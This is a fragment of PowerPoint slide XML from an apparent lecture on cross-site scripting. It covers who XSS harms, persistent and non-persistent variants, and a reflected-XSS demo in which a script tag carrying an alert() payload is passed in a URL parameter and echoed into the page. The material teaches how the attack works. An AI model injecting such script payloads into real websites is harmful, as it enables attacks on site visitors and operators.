            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C3503C-5C69-1026-86AE-CC45149B1552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7674449" y="5257801"/>
            <a:ext cx="84407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Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0F2C06-AEDE-67EA-B118-0510506BC62C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6472403" y="1752601"/>
            <a:ext cx="151272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ar-SA" sz="2200"/>
              <a:t>Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50927D57-5140-CC68-E5CA-ABFF2BC0E052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="2362200"/>
            <a:ext cx="1981200" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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GET Money for FREE !!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1000"/>
              <a:t>&lt;script&gt; attack code &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DED0B10-C62F-506E-415A-5F9CB4C3C5BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="5867400"/>
            <a:ext cx="1143000" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF99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 attack code !!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D910C60E-A5BD-2C37-D269-FE6D4D1A4BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9224840" y="4119023"/>
            <a:ext cx="2675604" cy="207529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de-DE" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t>This is only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="2400" dirty="0"/>
              <a:t> example out of many attack scenarios!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64AAB74-62DE-D42E-5530-6E6C6DC3E422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8153400" y="2743200"/>
            <a:ext cx="1981200"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Re: Error message on startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91249746-7BE2-8038-24CF-3FC611C137E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8229600" y="2971800"/>
            <a:ext cx="1981200"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I found a solution!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECAFCDE5-EA9A-E3F8-2572-071634942750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305800" y="3200400"/>
            <a:ext cx="1981200"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Can anybody help?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E82B1B4-DD1B-E864-0951-53866320E940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="3429000"/>
            <a:ext cx="1981200" cy="40011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de-DE" altLang="ar-SA" sz="1000"/>
              <a:t>Error message on startup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421399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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="20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out)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(ou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32"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ox(out)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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 presetClass="entr" presetSubtype="32"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ox(out)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="2" presetClass="entr" presetSubtype="1" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200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 presetClass="entr" presetSubtype="32"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ox(out)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="23" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200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P spid="13" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="14" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="15" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="2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3265C812-C319-81FD-B05F-57E5E9A5C33C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2777496" y="1368980"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Diagram of XSS Attack  (another scenario)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6306ABD8-DD29-6AFD-E68D-FE29F40180D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490328" y="1897063"/>
            <a:ext cx="8515350" cy="4257675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4177312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50436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252460" y="521683"/>
            <a:ext cx="66996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Who is affected by XSS?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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B04AFE-4877-D6D3-4C53-291E92202CEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="6443345" cy="4023360"/>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altLang="ar-SA" sz="2400"/>
              <a:t>XSS attack’s first target is the Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:t>Client trusts server (Does not expect attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:t>Browser executes malicious script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA" sz="2400"/>
              <a:t>But second target = Company running the Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:t>Loss of public image (Blame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:t>Loss of customer trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:t>Loss of money</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="987099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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B0C4BBB-1613-C198-E296-6B81ACB3B592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900458" y="6459785"/>
            <a:ext cx="1312025" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4575C9B1-0955-4468-B768-533E84C0364C}" type="slidenum">
              <a:rPr lang="en-US" altLang="ar-SA"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ar-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F35880-D2F6-D070-C9F6-B3179181ADC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1284274" y="2122716"/>
            <a:ext cx="389343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r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1600" b="1" dirty="0"/>
              <a:t>http://myserver.com/test.jsp?name=Stefan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 18" descr="normal_use">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F9C149-41EE-EF5B-599A-05D271D519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58213" y="2476730"/>
            <a:ext cx="3592513" cy="17605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9" descr="notepad_jsp">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B326646-16D8-5320-9AA4-40378DF9D65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0800000" flipH="1" flipV="1">
            <a:off x="2295525" y="1405266"/>
            <a:ext cx="4089400" cy="619125"/>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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92AC7303-5197-1879-C74F-8403515A1C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1131425" y="4180116"/>
            <a:ext cx="669106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r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1600" b="1" dirty="0"/>
              <a:t>http://myserver.com/welcome.jsp?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert("Attacked")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 17" descr="attacked_use">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B26D5D0-C1E4-F363-494C-02F7ECB5FD5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58212" y="4534130"/>
            <a:ext cx="4203700" cy="17430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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61EDE8BF-563F-DCEC-FE5C-36BD0B61E424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5399153" y="2503716"/>
            <a:ext cx="1712135" cy="147732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r>
              <a:rPr lang="de-DE" altLang="ar-SA"/>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA"/>
              <a:t>&lt;Body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA"/>
              <a:t>Welcome Stefan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA"/>
              <a:t>&lt;/Body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA"/>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA2EDF12-BFCE-DFFD-CE28-1019B4248356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6064250" y="4576695"/>
            <a:ext cx="3124200" cy="20313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r>
              <a:rPr lang="de-DE" altLang="ar-SA" dirty="0"/>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" dirty="0"/>
              <a:t>&lt;Body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" dirty="0"/>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert("Attacked")&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" dirty="0"/>
              <a:t>&lt;/Body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="de-DE" altLang="ar-SA" dirty="0"/>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ar-SA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333418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32"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ox(ou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32"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ox(out)">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8"/>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 presetClass="entr" presetSubtype="32"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ox(out)">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32"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ox(ou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8" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="10" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11"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81597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41840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XSS categories  </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46630E5-4D09-DA4D-3CB6-380BF1357FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="870324" y="2281248"/>
            <a:ext cx="7303292" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Categoriesof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> XSS attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Nonaltering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Non Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>): causes no change to the page functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Altering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>): a script injection that can be placed permanently in the database which causes change to the page functionality that will persist each time the page is requested</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B859C6C-3590-FDB8-DA7D-E7CBC77AC561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460081" y="1670318"/>
            <a:ext cx="6228182" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
